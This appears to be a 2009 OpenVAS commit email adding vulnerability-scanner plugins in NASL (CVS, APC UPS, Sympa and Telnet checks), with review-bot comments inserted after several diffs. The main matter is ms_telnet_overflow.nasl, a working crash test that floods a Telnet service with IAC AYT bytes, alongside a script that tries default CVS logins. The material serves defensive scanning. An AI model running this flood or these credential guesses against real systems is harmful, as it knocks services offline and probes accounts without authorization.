[Openvas-commits] r5376 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Mon Oct 5 19:43:10 CEST 2009


Author: mime
Date: 2009-10-05 19:43:01 +0200 (Mon, 05 Oct 2009)
New Revision: 5376

Added:
   trunk/openvas-plugins/scripts/apcnisd_detect.nasl
   trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl
   trunk/openvas-plugins/scripts/cvspserver_version.nasl
   trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl
   trunk/openvas-plugins/scripts/sympa_detect.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/cvs_file_existence_info_weak.nasl
   trunk/openvas-plugins/scripts/cvs_malformed_entry_lines_flaw.nasl
   trunk/openvas-plugins/scripts/http_header_name_format_string.nasl
   trunk/openvas-plugins/scripts/monkeyweb_post_DoS.nasl
   trunk/openvas-plugins/scripts/mssql_brute_force.nasl
   trunk/openvas-plugins/scripts/secpod_ibm_db2_detect_win_900218.nasl
   trunk/openvas-plugins/scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl
   trunk/openvas-plugins/scripts/sybase_blank_password.nasl
   trunk/openvas-plugins/scripts/webmirror.nasl
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/ChangeLog	2009-10-05 17:43:01 UTC (rev 5376)
@@ -1,3 +1,32 @@
+2009-10-05  Michael Meyer <michael.meyer at intevation.de>
+
+	* scripts/cvspserver_version.nasl,
+	scripts/apcnisd_detect.nasl,
+	scripts/cvs_pserver_heap_overflow.nasl:
+	Added new plugins.
+
+	* scripts/secpod_ibm_db2_detect_win_900218.nasl,
+	scripts/monkeyweb_post_DoS.nasl,
+	scripts/http_header_name_format_string.nasl,
+	scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl:
+	Bugfixes.
+
+	* scripts/cvs_malformed_entry_lines_flaw.nasl,
+	scripts/cvs_file_existence_info_weak.nasl:
+	Added cvspserver_version.nasl as dependency.
+
+	* scripts/webmirror.nasl:
+	Removed debug stuff.
+
+	* scripts/sybase_blank_password.nasl,
+	scripts/mssql_brute_force.nasl:
+	Removed dependency "sybase_detect.nasl". Both scripts can do
+	their job without these dependency.
+
+	* scripts/sympa_detect.nasl,
+	scripts/ms_telnet_overflow.nasl:
+	Added plugins developed by LSS Security Team.
+
 2009-10-05  Chandrashekhar B <bchandra at secpod.com>
 
 	* scripts/gb_opera_cmd_exec_n_xss_vuln_lin.nasl,

Added: trunk/openvas-plugins/scripts/apcnisd_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/apcnisd_detect.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/apcnisd_detect.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -0,0 +1,78 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# apcupsd and apcnisd Detection Detection
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100292);
+ script_version ("1.0-$Revision$");
+
+ desc = "Overview:
+   This host is running apcupsd or apcnisd . apcupsd and apcnisd
+   can be used for power mangement and controlling of APC's UPS
+   models.
+
+   See also:
+   http://www.apcupsd.com/
+
+   Risk factor : None";
+
+ script_name("apcupsd and apcnisd Detection Detection");
+ script_description(desc);
+ script_summary("Checks for the presence of apcupsd or apcnisd");
+ script_category(ACT_GATHER_INFO);
+ script_family("Service detection");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes");
+ script_require_ports("Services/unknown", 3551, 7000);
+ exit(0);
+}
+
+include("misc_func.inc");
+include("global_settings.inc");
+
+ports = make_list(7000, 3551);
+
+foreach port (ports) {
+
+  if(!get_port_state(port))continue;
+  soc = open_sock_tcp(port);
+  if(!soc)continue;
+  req  = raw_string(0x00, 0x06);
+  req += string("status");
+
+  send(socket:soc, data:req);
+  buf = recv(socket:soc, length:4096);
+  
+  if("APC" >< buf && "STATUS" >< buf) {
+   register_service(port:port, proto:"apcnisd"); 
+   if(report_verbosity > 0) { 
+      security_note(port:port);
+      exit(0);
+   }   
+ }  
+}
+
+exit(0);
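Review bot: The socket opened inside the `foreach port` loop is never closed, on either the match or the no-match path; add `close(soc);` right after the `recv()` call. The `exit(0);` also sits inside `if(report_verbosity > 0)`, so with verbosity 0 the loop goes on to probe the second port, while with a higher verbosity it stops at the first hit; moving it out of that block, or dropping it so both ports get registered, makes the behaviour consistent. `script_require_ports` lists `Services/unknown`, but only the hard-coded ports 7000 and 3551 are probed. The title "apcupsd and apcnisd Detection Detection" repeats a word in both the header comment and `script_name`.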


Property changes on: trunk/openvas-plugins/scripts/apcnisd_detect.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/cvs_file_existence_info_weak.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cvs_file_existence_info_weak.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/cvs_file_existence_info_weak.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -43,8 +43,8 @@
  script_copyright("This script is Copyright (C) 2004 David Maciejak");
  family = "General";
  script_family(family);
- script_require_ports("Services/cvspserver", port);
- script_dependencies("find_service.nes", "cvs_pserver_heap_overflow.nasl");
+ script_require_ports("Services/cvspserver", 2401);
+ script_dependencies("find_service.nes", "cvspserver_version.nasl");
  exit(0);
 }
 

Modified: trunk/openvas-plugins/scripts/cvs_malformed_entry_lines_flaw.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cvs_malformed_entry_lines_flaw.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/cvs_malformed_entry_lines_flaw.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -51,8 +51,8 @@
  script_copyright("This script is Copyright (C) 2004 David Maciejak");
  family = "General";
  script_family(family);
- script_require_ports("Services/cvspserver", port);
- script_dependencies("find_service.nes", "cvs_pserver_heap_overflow.nasl");
+ script_require_ports("Services/cvspserver", 2401);
+ script_dependencies("find_service.nes", "cvspserver_version.nasl");
  exit(0);
 }
 

Added: trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -0,0 +1,94 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# CVS Malformed Entry Modified and Unchanged Flag Insertion Heap Overflow Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100289);
+ script_bugtraq_id(10384);
+ script_cve_id("CVE-2004-0396");
+ script_version ("1.0-$Revision$");
+
+ script_name("CVS Malformed Entry Modified and Unchanged Flag Insertion Heap Overflow Vulnerability");
+
+desc = "Overview:
+CVS is prone to a remote heap overflow vulnerability. This issue
+presents itself during the handling of user-supplied input for entry
+lines with 'modified' and 'unchanged' flags. This vulnerability can
+allow an attacker to overflow a vulnerable buffer on the heap,
+possibly leading to arbitrary code execution.
+
+CVS versions 1.11.15 and prior and CVS feature versions 1.12.7 and
+prior are prone to this issue.
+
+**UPDATE: Symantec has confirmed that this vulnerability is being
+actively exploited in the wild. Administrators are urged to
+upgrade and block external access to potentially vulnerable
+servers, if possible.
+
+Solution:
+CVS versions 1.11.16 and 1.12.8 have been released to address
+this issue.
+
+References:
+http://www.securityfocus.com/bid/10384
+http://security.e-matters.de/advisories/072004.html?SID=384b888de96e3bce19306db8577fca26
+http://support.coresecurity.com/impact/exploits/62024ecea12fe1bbd01479065b3a1797.html
+http://ccvs.cvshome.org/
+http://marc.theaimsgroup.com/?l=openbsd-security-announce&m=108508894405639&w=2
+http://rhn.redhat.com/errata/RHSA-2004-190.html
+http://www.us-cert.gov/cas/techalerts/TA04-147A.html
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if CVS is prone to a remote heap overflow vulnerability");
+ script_category(ACT_GATHER_INFO);
+ script_family("General");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("cvspserver_version.nasl");
+ script_require_ports("Services/cvspserver", 2401);
+ exit(0);
+}
+
+include("version_func.inc");
+
+port = get_kb_item("Services/cvspserver");
+if(!port)port = 2401;
+
+if(!get_port_state(port))exit(0);
+
+if(!version = get_kb_item(string("cvs/", port, "/version")))exit(0);
+if(!isnull(version)) {
+
+  if(version_is_less(version: version, test_version: "1.11.15") ||
+     version_in_range(version: version, test_version: "1.12", test_version2: "1.12.7")) {
+      security_warning(port:port);
+      exit(0);
+  }
+
+}
+
+exit(0);
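Review bot: The version test does not match the advisory text in `desc`: "1.11.15 and prior" is stated as affected, but `version_is_less(version: version, test_version: "1.11.15")` leaves 1.11.15 itself unreported. Comparing against the fixed release closes the gap: `version_is_less(version: version, test_version: "1.11.16")`. The `if(!isnull(version))` wrapper is redundant, because the line before it already exits when the KB entry is missing. Since the verdict rests only on the version stored by cvspserver_version.nasl, a server that rejects the anonymous logins tried there is silently not assessed; a sentence in `desc` saying so would help readers of the report.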


Property changes on: trunk/openvas-plugins/scripts/cvs_pserver_heap_overflow.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/cvspserver_version.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cvspserver_version.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/cvspserver_version.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -0,0 +1,97 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# CVS pserver version Detection
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100288);
+ script_version ("1.0-$Revision$");
+
+ script_name("CVS pserver version");
+
+ desc = "Overview : This script retrieves the version of CVS pserver
+  and saves the result in KB.
+
+  Risk factor : Informational";
+
+ script_description(desc);
+ script_summary("Set Version of CVS pserver in KB");
+ script_category(ACT_GATHER_INFO);
+ script_family("Service detection");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes");
+ script_require_ports("Services/cvspserver", 2401);
+ exit(0);
+}
+
+port = get_kb_item("Services/cvspserver");
+if(!port)port = 2401;
+if(!get_port_state(port))exit(0);
+
+logins      = make_list("anonymous", "anoncvs");
+passwords   = make_list("","anoncvs", "anon");
+dirs        = make_list("/var/lib/cvsd/","/cvs", "/cvsroot", "/home/ncvs", "/usr/local/cvs");
+
+foreach dir (dirs) {
+ foreach login (logins) {
+  foreach password (passwords) {
+
+    soc = open_sock_tcp(port);
+    if(!soc)exit(0);
+
+    req = string("BEGIN AUTH REQUEST\n", dir, "\n", login,"\n", "A", pass,"\n", "END AUTH REQUEST\n");
+    send(socket:soc, data:req);
+    buf = recv_line(socket:soc, length:4096);
+
+    if("I LOVE YOU" >< buf) {
+
+      set_kb_item(name:string("cvs/", port, "/login"), value:login);
+      set_kb_item(name:string("cvs/", port, "/pass"),  value:password);
+      set_kb_item(name:string("cvs/", port, "/dir"),   value:dir);
+
+      send(socket:soc, data:string("Root ", dir, "\nversion\n"));
+      buf = recv_line(socket:soc, length:4096);
+
+      if(egrep(string: buf, pattern: "CVS", icase:TRUE)) {
+
+	version = eregmatch(string:buf, pattern:"([0-9.]+)"); 
+
+	if(!isnull(version[1])) {
+            set_kb_item(name:string("cvs/", port, "/version"), value:version[1]);
+	    exit(0);
+	} else {
+            exit(0);;
+          } 	  
+      } else {
+          exit(0);
+        }
+    } else {
+       continue; 
+      }   
+  }
+ } 
+}
+
+exit(0);
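Review bot: The auth request is built with `pass`, which is never assigned in this script; the loop variable is `password`, so every attempt sends an empty password field while the `cvs/<port>/pass` KB entry records whatever `password` held at that iteration. Use `"A", password` in the `string()` call; the leading "A" suggests the pserver scrambled-password form, so non-empty candidates probably need that encoding before they are sent (confirm against the protocol). The socket opened on each iteration is never closed, so add `close(soc);` before the `continue` and before each `exit(0)`. `if(!soc)exit(0);` inside the innermost loop also ends the whole script on one failed connect, and `exit(0);;` carries a stray semicolon.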


Property changes on: trunk/openvas-plugins/scripts/cvspserver_version.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/http_header_name_format_string.nasl
===================================================================
--- trunk/openvas-plugins/scripts/http_header_name_format_string.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/http_header_name_format_string.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -51,8 +51,7 @@
 if (! get_port_state(port)) exit(0);
 if (http_is_dead(port: port)) exit(0);
 
-req = http_get(item: strcat("/openvas", rand_str(), ".html"),
-                      "Host: ", get_host_name(), port: port);
+req = http_get(item: strcat("/openvas", rand_str(), ".html"), port: port);
 
 soc = http_open_socket(port);
 if (! soc) exit(0);

Modified: trunk/openvas-plugins/scripts/monkeyweb_post_DoS.nasl
===================================================================
--- trunk/openvas-plugins/scripts/monkeyweb_post_DoS.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/monkeyweb_post_DoS.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -59,8 +59,7 @@
 
 soc = http_open_socket(port);
 if (! soc) exit(0);
-r = http_post(item: "/", "Host: ", get_host_name(),
-                             port: port, data: "");
+r = http_post(item: "/", port: port, data: "");
 r2 = ereg_replace(string: r,
 	pattern: 'Content-Length:([ 0-9]+)', replace: 'Content-Length:');
 if (r2 == r)	# Did not match?

Added: trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl
===================================================================
--- trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -0,0 +1,90 @@
+###################################################################
+# OpenVAS Network Vulnerability Test
+# $ID$
+#
+# MS Telnet Overflow
+#
+# LSS-NVT-2009-008
+#
+# Developed by LSS Security Team <http://security.lss.hr>
+#
+# Copyright (C) 2009 LSS <http://www.lss.hr>
+#
+# This program is free software: you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation, either version 2 of
+# the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public
+# License along with this program. If not, see
+# <http://www.gnu.org/licenses/>.
+###################################################################
+
+if(description)
+{
+ script_id(102008);
+ script_version("1.0-$Revision$");
+ script_bugtraq_id(4061);
+ script_cve_id("CVE-2002-0020");
+
+ name = "MS Telnet Overflow";
+ script_name(name);
+
+ desc = "
+It is possible to crash remote telnet server via malformed protocol options.
+This flaw may allow attackers to execute arbitrary code on the system.
+
+Solution: http://www.microsoft.com/technet/security/bulletin/ms02-004.mspx
+
+Risk factor :High
+";
+
+ script_description(desc);
+
+ summary = "Attempts to overflow the Telnet server buffer";
+ script_summary(summary);
+
+ script_category(ACT_DESTRUCTIVE_ATTACK);
+
+ script_copyright("Copyright (C) 2009 LSS");
+ family = "Buffer overflow";
+ script_family(family);
+ script_require_ports("Services/telnet", 23);
+ exit(0);
+}
+
+##ATTACK##
+##Vulnerability tested on AYT commands##
+function telnet_attack(port){
+  iac_ayt = raw_string(0xff, 0xf6);
+  bomb_size = 100000;
+  sock = open_sock_tcp(port);
+  if(sock){
+    bomb = crap(data:iac_ayt, length:2*bomb_size);
+    send(socket:sock, data:bomb);
+    close(sock);
+    return(1);
+  }else{
+    log_message(data:'Can\'t connect to port ' + port);
+    return(0);
+  }
+}
+
+##MAIN##
+port = get_kb_item("Services/telnet");
+if(!port) port = 23;
+
+if(telnet_attack(port:port)){
+  sock = open_sock_tcp(port);
+  if(!sock){
+    security_hole(port);
+  }else{
+    close(sock);
+  }
+}else exit(-1);
+
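Review bot: A single failed reconnect immediately after the send is reported through `security_hole(port)`, so a transient refusal, a connection limit or a filtering device in the path yields a false positive, and nothing in the script confirms that the service is a Microsoft telnet server before it is reported as such. Adding `if(!get_port_state(port)) exit(0);` before the `telnet_attack()` call, and a short pause with one retry before reporting, would make the result more reliable. `exit(-1)` on a failed connect differs from the `exit(0)` used by the other plugins in this commit. The header has `$ID$`, where the `svn:keywords` property set on this file expands `$Id$`.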


Property changes on: trunk/openvas-plugins/scripts/ms_telnet_overflow.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/mssql_brute_force.nasl
===================================================================
--- trunk/openvas-plugins/scripts/mssql_brute_force.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/mssql_brute_force.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -48,7 +48,7 @@
  family = "Windows";
  script_family(family);
  script_require_ports("Services/mssql", 1433); 
- script_dependencie("mssqlserver_detect.nasl", "sybase_detect.nasl");
+ script_dependencie("mssqlserver_detect.nasl");
  exit(0);
 }
 
@@ -190,7 +190,7 @@
 
 report = "";
 port = get_kb_item("Services/mssql");
-if(!port) port = get_kb_item("Services/sybase");
+#if(!port) port = get_kb_item("Services/sybase");
 if(!port) port = 1433;
 
 

Modified: trunk/openvas-plugins/scripts/secpod_ibm_db2_detect_win_900218.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_ibm_db2_detect_win_900218.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/secpod_ibm_db2_detect_win_900218.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -51,6 +51,10 @@
 include("smb_nt.inc");
 include("secpod_smb_func.inc");
 
+if(!get_kb_item("SMB/WindowsVersion")){
+    exit(0);
+}
+
 key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\";
 foreach item (registry_enum_keys(key:key))
 {

Modified: trunk/openvas-plugins/scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/secpod_prochatrooms_dir_trav_n_xss_vuln.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -79,6 +79,7 @@
 
 
 include("version_func.inc");
+include("http_func.inc");
 include("http_keepalive.inc");
 
 pcrPort = get_kb_item("Services/www");

Modified: trunk/openvas-plugins/scripts/sybase_blank_password.nasl
===================================================================
--- trunk/openvas-plugins/scripts/sybase_blank_password.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/sybase_blank_password.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -45,7 +45,7 @@
  family = "Databases";
  script_family(family);
  script_require_ports("Services/sybase", 5000); 
- script_dependencies("sybase_detect.nasl");
+ script_dependencies("find_service.nes");
  exit(0);
 }
 
@@ -152,8 +152,9 @@
 }
 
 
-port = get_kb_item("Services/sybase");
-if(!port)port = 5000;
+#port = get_kb_item("Services/sybase");
+#if(!port)port = 5000;
+port = 5000;
 
 found = 0;
 
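Review bot: Hard-coding `port = 5000;` means a Sybase listener on any other port is never tested, although `script_require_ports("Services/sybase", 5000)` in the first hunk still advertises the KB key. The KB lookup is harmless without a detector, so `port = get_kb_item("Services/sybase"); if(!port) port = 5000;` could stay and would pick the key up again once a detection plugin sets it. If the fixed port is intended, delete the two commented-out lines rather than leaving them in; the same applies to the commented-out `Services/sybase` line in mssql_brute_force.nasl.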

Added: trunk/openvas-plugins/scripts/sympa_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/sympa_detect.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/sympa_detect.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -0,0 +1,128 @@
+###################################################################
+# OpenVAS Network Vulnerability Test
+#
+# Sympa Detection
+#
+# LSS-NVT-2009-013
+#
+# Developed by LSS Security Team <http://security.lss.hr>
+#
+# Copyright (C) 2009 LSS <http://www.lss.hr>
+#
+# This program is free software: you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation, either version 2 of
+# the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public
+# License along with this program. If not, see
+# <http://www.gnu.org/licenses/>.
+###################################################################
+
+if(description)
+{
+ script_id(102013);
+ script_version("1.1-$Revision$");
+
+ script_name("Sympa Detection");
+
+ desc = "
+The remote host is running Sympa, an open source (GNU GPL) mailing list management (MLM) software
+suite written in Perl.
+
+See also : 
+
+http://www.sympa.org/
+
+Risk factor : None
+";
+
+ script_description(desc);
+
+ script_summary("Detects Sympa");
+
+ script_category(ACT_GATHER_INFO);
+
+ script_copyright("Copyright (C) 2009 LSS");
+ script_family("Service detection");
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ script_require_ports("Services/www", 80, 443);
+ 
+ exit(0);
+}
+
+include("global_settings.inc");
+include("http_func.inc");
+include("openvas-https.inc");
+
+
+# Function that checks each dir for Sympa installation
+# Optionally can use https
+
+function CheckSympa(use_https) {
+  dirs = make_list("/sympa", cgi_dirs());
+
+  # Go through dirs
+  foreach dir (dirs)
+  {
+    url = string(dir, "/");
+    req = http_get(item:url, port:port);
+    if(use_https==1)
+      req = https_req_get(request: req, port:port);
+    else
+      req = http_send_recv(data: req, port:port);
+      
+    if(isnull(req)) return;
+
+    # Check if it is Sympa
+    pat='Powered by ([^>]*>)?Sympa ?v?([0-9.]+)';
+    match=egrep(pattern:pat,string:req, icase:1);
+    
+    if(match || egrep(pattern:"<meta name=.generator. content=.Sympa",string:req,icase=1)) {
+      
+      # Instalation found, extract version
+      item=eregmatch(pattern:pat,string:match, icase:1);
+      ver=item[2];
+
+      # If version couldn't be extracted, mark as unknown
+      if(!ver) ver="unknown";
+
+      set_kb_item(name:string("www/", port, "/sympa"),value:string(ver, " under ", dir));
+      if(report_verbosity) {
+        if(dir=="") dir="/";
+        info+=" Version: " +ver + " under "+dir+'\n'+'\n';
+      }
+      n++;
+      if(!thorough_tests) break;
+    }
+  }
+}
+
+n=0;
+info="";
+
+# Check for installations on https
+port = get_kb_item("Services/www");
+if(!port) port = 443;
+if (get_port_state(port))
+  CheckSympa(use_https: 1);
+
+# Check for installations on http
+if(!n || thorough_tests) {
+  port = get_http_port(default:80);
+  if (get_port_state(port))
+    CheckSympa(use_https: 0);
+}
+
+if(!n) exit(0);
+
+if(report_verbosity) {
+  info="The following version(s) of Sympa were detected: "+'\n'+'\n'+info;
+  security_note(port:port, data:info);
+} else
+  security_note(port:port);
\ No newline at end of file
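Review bot: In the second `egrep()` call of `CheckSympa` the last argument is written `icase=1`, an assignment rather than the named argument `icase:1` used in the other calls, so the generator-meta match is probably not case-insensitive as intended; change it to `icase:1`. The "https" pass takes `port` from `Services/www` (falling back to 443) and sends HTTPS to it without checking that the port speaks TLS, and the final `security_note(port:port)` uses whichever port was assigned last, which may not be the one where Sympa was found. `if(isnull(req)) return;` abandons the remaining directories after one failed request, where `continue` looks intended. The description block declares no `script_dependencies()` although the script reads `Services/www`.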


Property changes on: trunk/openvas-plugins/scripts/sympa_detect.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/webmirror.nasl
===================================================================
--- trunk/openvas-plugins/scripts/webmirror.nasl	2009-10-05 13:53:32 UTC (rev 5375)
+++ trunk/openvas-plugins/scripts/webmirror.nasl	2009-10-05 17:43:01 UTC (rev 5376)
@@ -1138,14 +1138,6 @@
   set_kb_item(name:string("www/", port, "/password_protected"), value:TRUE);
  }
 }
-foreach URL (URLs)
-{
- display(URL,"\n");
-}
-
-display("-----------------------------------------\n");
-
-
 report = "";
 
 foreach foo (keys(CGIs))


